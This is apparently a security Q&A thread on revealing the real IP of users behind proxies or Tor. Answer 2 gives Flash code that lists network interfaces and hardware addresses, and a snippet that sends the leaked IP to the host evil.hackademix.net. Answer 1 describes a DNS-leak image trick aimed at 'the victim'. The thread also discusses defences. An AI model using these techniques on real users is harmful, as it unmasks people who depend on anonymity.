Reveal the True IP of a User

Question

Is there any best practice method (and preferably documented) way of revealing the True IP of a user using a HTTP(S) connection?

I.e.: To be able to uncover the true IP from transparent as well as anonymous proxies wherever possible.

Answer 1

If the connection uses proxies which are correctly implemented, discovering the ip through http or tcp can be difficult. You may have some luck in getting closer to the ip using DNS instead. for If you generate the page dynamically to contain an image located at a domain that you control, e.g.

<img src="http://123123.deanonymize.mydomain.com"/>

the browser will perform a lookup on 123123.deanonymize.mydomain.com. This will result in a recursive DNS-query that eventually will reach your dns for mydomain.com. The query will originate from whatever dns the victim is using, typically the ISP. So, while it will not give you the exact IP, it may point you in a general direction.

AFAIK, this method works even if the victim uses TOR in vanilla mode, see https://trac.torproject.org/projects/tor/wiki/doc/PreventingDnsLeaksInTor for more information.

Another way may be to use a java-applet to figure out the IP at the client side, but I'm not up-to-date on what limits are in place for that nowadays.

Answer 2

There are many ways to do it. Here are some more methods:

1. Poll Network Interfaces (Flash, can get local information)

   import flash.net.NetworkInfo;
   
   public function findInterface():void
   {
       var results:Vector.<NetworkInterface> =
          NetworkInfo.networkInfo.findInterfaces();
   
       for (var i:int=0; i<results.length; i++)
       {
           var output = output
           + "Name: " + results[i].name + "\n"
           + "DisplayName: " + results[i].displayName + "\n"
           + "MTU: " + results[i].mtu + "\n"
           + "HardwareAddr: " + results[i].hardwareAddress + "\n"
           + "Active: "  + results[i].active + "\n";
   
   
           for (var j:int=0; j<results[i].addresses.length; j++)
           {
              output = output
              + "Addr: " + results[i].addresses[j].address + "\n"
              + "Broadcast: " + results[i].addresses[j].broadcast + "\n"
              + "PrefixLength: " + results[i].addresses[j].prefixLength + "\n"
              + "IPVersion: " + results[i].addresses[j].ipVersion + "\n";
           }
   
           output = output + "\n";
       }
   }
   

2. Send an XML "ping" (Flash, only affects browser-defined proxies)

   var socket = new XMLSocket();
   socket.onConnect = function(success) {
       socket.onXML = function(doc) {
           getURL("http://evil.hackademix.net/proxy_bypass?ip=" + 
               doc.firstChild.firstChild.nodeValue);
           socket.close();
       };
       socket.send(new XML());
   };
   socket.connect("evil.hackademix.net", 9999);    
   

3. Note that all of your hardware information can be revealed by flash. (Thanks, TildalWave)

4. Exploiting browser plugins. Note that this attack isn't likely to affect you if you're using a VPN, unless the plugin also finds a way to access local information somehow. This is mainly because some browsers will not enforce the proxy settings used in the browser. The solution is to use a VPN that enforces the connection across your connected interface. However, if your plugin is able to access local content (read/write/execute), all bets are off.

There's a way to do it in Java as well. Essentially, you'd want to turn off Java, Flash, Plugins, and Javascript, to avoid being pinged by these methods.

Answer 3

Hiding the IP is the point of anonymous proxies. Thus, if that machine is doing its job, it should not give it away. Although you could try running some javascript on the client side (I am not sure if this will work in your case.).

For transparent proxies, there is some information in this question. It boils down to using the X-Forwarded-For header.